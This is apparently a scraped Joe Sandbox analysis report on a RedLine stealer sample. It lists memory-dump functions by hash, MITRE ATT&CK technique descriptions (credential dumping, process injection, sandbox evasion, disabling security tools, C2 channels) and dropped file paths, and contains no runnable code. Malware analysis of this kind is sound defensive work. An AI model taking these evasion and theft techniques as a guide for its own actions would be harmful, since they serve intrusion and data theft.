Opcode Fuzzy Hash: ec207f532d46f2962d5f19fb7dafe927c2ca4e6a8fb54bbe7459b1885c0c4816
Instruction Fuzzy Hash: A712BB30B40A198FCB15DF68D550A6FBBB2FF85710F00495CD5429F3A5CBBAE9098B86

Function 067D056A Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c88f7fd894f53ae86640f002d0222a0de66097638b365703a26de985e27ce0
Instruction ID: 3d523a73d582ffcf69ee64808e80c244872cfe9c80a6e809213c0483177d3537
Opcode Fuzzy Hash: 99c88f7fd894f53ae86640f002d0222a0de66097638b365703a26de985e27ce0
Instruction Fuzzy Hash: 9B02DD30B40A098FDB11DF68D550A6FBBB6FF85710F008958D5429F3A5CBB6E909CB92

Function 067D05E0 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739712710c2ba20ac59b9cb2657fa33d4f83744006929b3917b97d5eaffaf0b4
Instruction ID: 46aff85f523b70d6bc74b96d5c8928aaadc8806c7e88b175463791c94c92d134
Opcode Fuzzy Hash: 739712710c2ba20ac59b9cb2657fa33d4f83744006929b3917b97d5eaffaf0b4
Instruction Fuzzy Hash: 3702ED30B00A099FDB11DF68D950A6FBBB6FF85700F008959D5029F3A5CBB6E905CB92

Function 067D0656 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb79bba7bd254a5225ba1a29a332bfb194baa098a72dfa8608d9182b25266921
Instruction ID: c09c8cec8c67eeb16606861ef3114b0b54caec2bb20beb521249231ad34990a7
Opcode Fuzzy Hash: bb79bba7bd254a5225ba1a29a332bfb194baa098a72dfa8608d9182b25266921
Instruction Fuzzy Hash: 5CF1DF30B00609DFDB01DF68D954A6EBBB6FF85700F008959E5029F3A5CBB6E945CB92

Function 067D06CC Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6355d4159819a1c03ef36fcc68d6ec7746c24ea197d525b35e77e820b4712a
Instruction ID: 2a8e69481fb950a9819cc55359afb70b023fc76d6793b5fc5c6bb756cf4c083a
Opcode Fuzzy Hash: bf6355d4159819a1c03ef36fcc68d6ec7746c24ea197d525b35e77e820b4712a
Instruction Fuzzy Hash: 57E1CE30B00608DFEB01DF68D955A6E7BB6FF84700F008859E9029F3A5CBB6D945CB92

Function 067D0001 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67dc9cb12dcbe04dba4c1e56e4062a3cf6683ee3d02edc8a818572e5401c7fe0
Instruction ID: 90f5d8bc2f9c83fbbf5efb5e25899454ea26d5393cad902f5e9f06c0a6fc7365
Opcode Fuzzy Hash: 67dc9cb12dcbe04dba4c1e56e4062a3cf6683ee3d02edc8a818572e5401c7fe0
Instruction Fuzzy Hash: 22D1CF30B106049FEB419F64C955A7E7BB6FF89700F04845AE5028F3A6CBB6DC45CBA2

Function 067D3138 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2896512d5caad148f54a951747cfadbfc2586850235169ea20389ddc4fa730
Instruction ID: d6de8465c06388aee71e8c5e15e0ab55188ec79ef3d5ccbda1d20112fab27ca4
Opcode Fuzzy Hash: 7c2896512d5caad148f54a951747cfadbfc2586850235169ea20389ddc4fa730
Instruction Fuzzy Hash: 9A918035B10205AFCB04CF68D984DAEBBF6EF89710B15849AE905EB361DA31EC05CB61

Function 067D11A8 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ed5a2ec153ae2b03eddf04aa1a99e1f10efcf681aa836c26ca3396cab30b04
Instruction ID: 0cfa981fbdd173066098ebcb0de2b4e2f179525fcc56c283d1ca8074edfc8bc8
Opcode Fuzzy Hash: f3ed5a2ec153ae2b03eddf04aa1a99e1f10efcf681aa836c26ca3396cab30b04
Instruction Fuzzy Hash: C3613431B003058FCB55AEBD988057ABBF6AFC6211B58C9BBD845CB251EB32D845C7A1

Function 0101D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355516053.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_101d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbeac9d76a402f5b1819daa12bf5053637c65ce22ef4c26f56c10ed4e557d0f
Instruction ID: 7a3bcf9c45142faaa25283e8087cc37a3f9ed791f3c8acfac552bd0c6f5dffee
Opcode Fuzzy Hash: fcbeac9d76a402f5b1819daa12bf5053637c65ce22ef4c26f56c10ed4e557d0f
Instruction Fuzzy Hash: C0210871500240EFCB16DF54D9C4F1ABFA5FB88314F24C5A9EA490B25AC33ED416CBA1

Function 0107D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355701316.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_107d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a84205deb54106a6a92abafd2077ae888813486320cad37d289a807787993c8
Instruction ID: f9f861bd67892fd25638cd8008c9b5502233105135499877c1e105419cd976d2
Opcode Fuzzy Hash: 6a84205deb54106a6a92abafd2077ae888813486320cad37d289a807787993c8
Instruction Fuzzy Hash: 04212671904244EFDB05DF58D5C0B2ABFA5FF84324F24C5A9D8894B256C33AD406CBB5

Function 0107D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355701316.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_107d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81cff9644ae89fab1817505d3701008e7aa5a204e9be9cd758e0f148af7bb537
Instruction ID: 150aabf76be412eed8e14c9e5787b9cf9873d615b9a33b3b509df678fdc94c1f
Opcode Fuzzy Hash: 81cff9644ae89fab1817505d3701008e7aa5a204e9be9cd758e0f148af7bb537
Instruction Fuzzy Hash: E9212571900204DFCB05DFA8C5C0B26BBA5FF88318F24C5ADD8894B256C73AE446CB66

Function 0101D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355516053.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_101d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
Instruction ID: 19a783d29938955c7025ddc8fff84d22e3a41ce385ab3fb11a799c43dcfdb11d
Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
Instruction Fuzzy Hash: 4221C072404280DFCB06CF54D9C4B16BFB2FB88314F2486A9E9480A25BC33AD456CB91

Function 0107D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355701316.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_107d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: c9988218ef049d5c3601830a9554fda173b98507d8c52b20fae41ca6097d7dff
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 2011DD75904280CFDB02CF58C5C4B15BFB1FF88318F28C6AAD8894B256C33AD44ACB62

Function 0107D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2355701316.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_107d000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
Instruction ID: dcde47255191832bcc9010abf23a0afd33ed8781cc1cc2952001bd7530b00971
Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
Instruction Fuzzy Hash: 9F11B275904280DFDB12CF14D5C4B19FFA1FB84324F28C6AAD8894B656C33AD44ACBA2

Non-executed Functions

Function 067D0D50 Relevance: 10.3, Strings: 8, Instructions: 295COMMON

Download Yara Rule

Strings

$]q, xrefs: 067D0E4E
$]q, xrefs: 067D0F50
$]q, xrefs: 067D0DCC
$]q, xrefs: 067D0E42
$]q, xrefs: 067D0F82
$]q, xrefs: 067D0E1C
$]q, xrefs: 067D0F00
$]q, xrefs: 067D0F76

Memory Dump Source

Source File: 00000015.00000002.2374354912.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_67d0000_AJzHYZtQIb.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 3cd5933096c518ba614751e74ba754ac3d113fb482ccee57526870e8e58ceb0c
Instruction ID: 7353995f73c7c544992703622f37f0fe76337fd5c99aea769561e7021fa498ba
Opcode Fuzzy Hash: 3cd5933096c518ba614751e74ba754ac3d113fb482ccee57526870e8e58ceb0c
Instruction Fuzzy Hash: 18B1AD30B002098FDB45EF69C954ABEBBF6BF88600F14886AE406D73A1DB35DC11CB95

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report w4XFffGDz1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJzHYZtQIb.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

C:\Users\user\AppData\Local\Temp\RarSFX0\PO.jpg

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fxchldq.gpv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5dgxrmw.020.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj5kt24d.bgw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncpykx4c.cxo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojbysllk.cf1.psm1

Windows Analysis Report
w4XFffGDz1.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre